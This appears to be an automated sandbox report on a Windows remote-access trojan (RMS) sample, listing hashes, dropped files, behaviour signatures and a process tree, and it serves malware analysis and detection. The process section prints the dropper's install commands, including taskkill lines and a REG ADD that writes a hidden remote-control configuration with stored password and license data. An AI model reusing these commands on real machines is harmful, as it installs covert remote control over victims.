MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\hide.dat

MD5 eb513889e806ce193274ea8858e89ab5
SHA1 3c1ff7bbe8bc2be9e5531ffad25b18f03c51cf6b
SHA256 f5609e3bcc1695839ae0d3a3ff08d5c73d0bab4afa3a2b5fced6c9b14f2aa993
SHA512 cb3d254c7ee4c918a320629e461b99acf90ef92d0276d2663f1b93ea17aa8612226c39c7c234283955fe9e071f7fa324f2586e7eba8ebc3fb5674f58af005e26

memory/1836-88-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-89-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-90-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-91-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-92-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-93-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/1836-94-0x0000000000400000-0x00000000004D3000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1836-97-0x0000000000400000-0x00000000004D3000-memory.dmp

\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.dat

MD5 27a98c9a7fa7120147ae523efa9fadbf
SHA1 6a5ca3b9ee0a048f0aee1e99cbf3943d84f597ff
SHA256 53071088adb86f5d7a8c82573da94849edbd5f102bc94c9775247a54e26eaf57
SHA512 8f09b0211e6c4c6d5ddf9a797e59501bb0db4cb2d8d730f4c412a4b83adf68ad617516f330e1b0bcfecb07c514be56440e5b2ac3c55537495ce19ae64fcbf03c

memory/2028-104-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1836-106-0x0000000000400000-0x00000000004D3000-memory.dmp

memory/2028-105-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-107-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-108-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-109-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-110-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-111-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-112-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-113-0x0000000000400000-0x0000000000AF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/2028-115-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-118-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/2028-119-0x0000000000240000-0x0000000000241000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1604-135-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1604-136-0x00000000003C0000-0x00000000003C1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1604-138-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1604-139-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1604-141-0x0000000000400000-0x0000000000AF8000-memory.dmp

memory/1604-143-0x0000000000400000-0x0000000000AF8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.dat

MD5 a24ce4468618751732a5f3cd01e66a8b
SHA1 4d46fb773c02a9ff98e998da4f0777fb5d9f796b
SHA256 acf797494691e34077f9e6cda9a39f91a3efa0a840b71859ffde36bf3e228f2e
SHA512 4eb928491764b2960474e71229d8a3f219029f91ff3725218d58de83ae414c3f7b3bc421915b008aaf1393706a0c836615906bd6a6291af6370bb9f98ab58a3a

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1756-148-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-149-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-150-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-151-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-152-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-153-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-154-0x0000000000400000-0x0000000000A98000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe

MD5 824b1588338b6731e28ff94c621ced0b
SHA1 cd1bc431f53e9cff8204279cdf274838de8ebb61
SHA256 5f8d156ed1f17a23a49f29b2e7954c629d74c0e12b98c46ced0c9f28f35aa369
SHA512 b9a9cbf1171a1328fcabf013cdf33133f19ab61bc34fc892fb592de007179def90af4be095038880e0d5653c5cfe2a191cccb1e906cfe335937201970550161e

memory/1756-161-0x0000000000400000-0x0000000000A98000-memory.dmp

memory/1756-162-0x0000000000230000-0x0000000000231000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-28 22:17

Reported

2022-01-28 22:45

Platform

win10-en-20211208

Max time kernel

163s

Max time network

170s

Command Line

"C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe"

Signatures

RMS

trojan rat rms

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\exe\StubAtl.pdb C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\exe\StubAtl.pdb C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
File opened for modification C:\Windows\SysWOW64\StubAtl.pdb C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A

autoit_exe

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2800 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2800 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2800 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2844 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2440 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe C:\Windows\SysWOW64\cmd.exe
PID 2440 wrote to memory of 3956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 3956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 3956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 1052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2440 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2740 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3368 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1956 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1176 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3416 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 3748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 1720 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2440 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2440 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2440 wrote to memory of 2076 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe
PID 2440 wrote to memory of 868 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 2440 wrote to memory of 868 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 2440 wrote to memory of 868 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 868 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
PID 1796 wrote to memory of 588 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 1796 wrote to memory of 588 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 1796 wrote to memory of 588 N/A C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
PID 588 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe

Processes

C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe

"C:\Users\Admin\AppData\Local\Temp\80fb8a3b1fda0a1483e87e749c7a2f2a9c9fdaf6c3d581668baba723b9e2a920.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\hide.exe" /rhc uac.cmd

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\uac.cmd" "

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c0c50617373776f726444617461060c364f6d2b75675147394b493d084869646553746f70090c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323033342e37373133373636373832084c6963656e73657306ba524d532d462d36423764666137333434354538394333393762653062623966423866433637666269593253326459586c52664477776e493233696f4f4743346f44686a584b647a4134585246344d44463145624373685631304e48313545447777374b57304241414d484151514e487a7370625135635251344141687741616d426841676b4362774d454377566d64324d4c42423